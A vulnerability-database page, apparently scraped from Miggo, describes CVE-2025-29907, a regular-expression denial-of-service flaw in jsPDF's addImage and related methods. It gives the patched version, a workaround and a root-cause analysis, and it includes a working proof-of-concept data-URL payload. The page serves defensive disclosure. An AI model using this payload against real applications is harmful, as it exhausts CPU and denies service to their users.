N/A

CVSS Score

-

CVSS Score

Basic Information

CVE ID

CVE-2025-29907

GHSA ID

GHSA-w532-jxjh-hjhj

EPSS Score

0.47021%

CWE

CWE-400

Published

3/18/2025

Updated

3/19/2025

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2025-29907

CVE-2025-29907: jsPDF Bypass Regular Expression Denial of Service (ReDoS)

Impact

User control of the first argument of the addImage method results in CPU utilization and denial of service.

If given the possibility to pass unsanitized image urls to the addImage method, a user can provide a harmful data-url that results in high CPU utilization and denial of service.

Other affected methods are: html, addSvgAsImage.

Example payload:

import { jsPDF } from "jpsdf" 

const doc = new jsPDF();
const payload = 'data:/charset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=s\x00base64,undefined';

const startTime = performance.now()

try {
 doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} catch (err) {
  const endTime = performance.now()
  console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`)
}

doc.save("a4.pdf");

Patches

The vulnerability was fixed in jsPDF 3.0.1. Upgrade to jspdf@>=3.0.1

Workarounds

Sanitize image urls before passing it to the addImage method or one of the other affected methods.

Credits

Researcher: Aleksey Solovev (Positive Technologies)

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2025-29907

CVE-2025-29907:

N/A

CVSS Score

-

CVSS Score

Basic Information

CVE ID

CVE-2025-29907

GHSA ID

GHSA-w532-jxjh-hjhj

EPSS Score

0.47021%

CWE

CWE-400

Published

3/18/2025

Updated

3/19/2025

KEV Status

Technology

JavaScript

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
jspdf	npm	< 3.0.1	3.0.1

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The core vulnerability lies in the extractImageFromDataUrl function, which used a ReDoS-prone regex to parse data URLs. This function is called by addImage (and likely html/addSvgAsImage). The commit explicitly fixes extractImageFromDataUrl by replacing the regex with safer parsing. While addImage, html, and addSvgAsImage are the user-facing entry points, the root cause is the insecure parsing in extractImageFromDataUrl. Confidence is high for extractImageFromDataUrl and addImage due to direct evidence in the diff/advisories, and medium for html/addSvgAsImage as they are referenced in advisories but lack explicit code examples.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

N/A

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2025-29907: jsPDF Bypass Regular Expression Denial of Service (ReDoS)

Impact

Patches

Workarounds

Credits

CVE-2025-29907:

N/A

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

N/A

N/A

Technical Details

CVE-2025-29907: jsPDF Bypass Regular Expression Denial of Service (ReDoS)

Impact

Patches

Workarounds

Credits

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI